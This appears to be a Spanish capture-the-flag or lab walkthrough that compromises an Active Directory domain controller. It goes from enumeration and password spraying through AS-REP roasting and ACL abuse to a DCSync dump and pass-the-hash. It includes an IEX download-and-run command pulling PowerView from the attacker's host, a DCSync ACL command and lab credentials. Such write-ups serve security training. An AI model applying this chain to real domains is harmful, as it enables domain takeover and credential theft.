ENUMERATION

KERBRUTE

BLOODHOUND

ASREPROAST

MOVIMIENTO LATERAL

DCSYNC

Lanzamos el comando nmap para realizar un primer scaneo de puertos de la máquina y saber
a que nos enfrentamos

El resultado del comando nmap nos muestra varios datos interesantes, estamos ante una
máquina Windows que ademas es un controlador de dominio. El dominio se llama
megabank.corp.
Lo primero que haremos será agregar el dominio a nuestro archivo hosts

Buscamos usuarios validos en el dominio usando la herramienta kerbrute

Ahora lanzamos un ataque de password spraying

Con las credenciales obtenidas establecemos conexión por evil-winrm

Enumerando grupos del dominio

Bloodhound

lanzamos el siguiente comando para extraer la información del dominio con bloodhound
utilizando las credenciales que hemos obtenido del usuario dave.
bloodhound-python -d megabank.corp -u dave -p ‘$PR1NG123@’ -ns 192.168.56.110
-c All

Analizamos resultados en bloodhound

El grupo account operators tiene permisos de fullcontrol (GenericAll) sobre el grupo MSOL y el
grupo MSOL tiene permisos de escritura sobre la raíz del dominio.
Analizamos con más detalle el grupo Account operators y vemos que es miembro de privilege
Users

si analizamos el grupo Privilege_users como ya vimos anteriormente al conectarnos con la
sesión de dave el grupo contiene al usuario jsmith

por tanto si conseguimos las credenciales del usuario jsmith podremos agregarnos al grupo
MSOL.
Vamos a realizar algunas comprobaciones, en el apartado Find Principals with DCSync Rights
comprobamos que efectivamente tenemos algunos usuarios y grupos privilegiados que tienen
permisos para realizar un ataque DCsync pero por ahora no podemos acceder a ellos.

Vamos a comprobar si tenemos alguna cuenta AS-REP Roasteable

Nos aparece la cuenta jsmith susceptible a este tipo de ataque, la analizamos en detalle

Y podemos confirmar la ruta de escalada al grupo MSOL
abrimos una nueva terminal en nuestra máquina kali y lanzamos el comando impacket para
obtener el hash del usuario jsmith

desencriptamos el password con john

Conectamos por Evil-WinRM

Teniendo ya en cuenta el análisis realizado con Bloodhound nos agregamos el usuario jsmith al
grupo MSOL.
Ahora vamos a usar la herramienta Powerview.ps1

Volvemos a la sesión de evil-WinRM y ejecutamos los siguientes comandos, la ip será la ip de
nuestra máquina atacante del inferface con visibilidad con la máquina víctima.
Ejecutamos PowerView.ps1 con el comando IEX apuntando a nuestra máquina de atacante.

IEX(New-Object
Net.WebClient).downloadString(‘http://192.168.56.106/PowerView.ps1’)

Nos guardamos la contraseña del usuario jsmith en la variable SecPassword

$SecPassword = ConvertTo-SecureString ‘$3PT3MB3R@’ -AsPlainText -Force

Nos guardamos las credenciales en la variable Cred

$Cred = New-Object
System.Management.Automation.PSCredential(‘megabank.corp\jsmith’,
$SecPassword)

Y agregamos al grupo MSOL los permisos de DCsync

Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity ‘MSOL’
-TargetIdentity “megabank.corp\MSOL” -Rights DCSync

Ahora con las credenciales del usuario jsmith y los permisos en el grupo MSOL lanzamos el
ataque DCsync con el comando impacket y ya podemos dumpear la base de datos del AD

Ahora hacemos un ataque pass-the-has desde Evil-WinRM, nos conectamos como
Administrator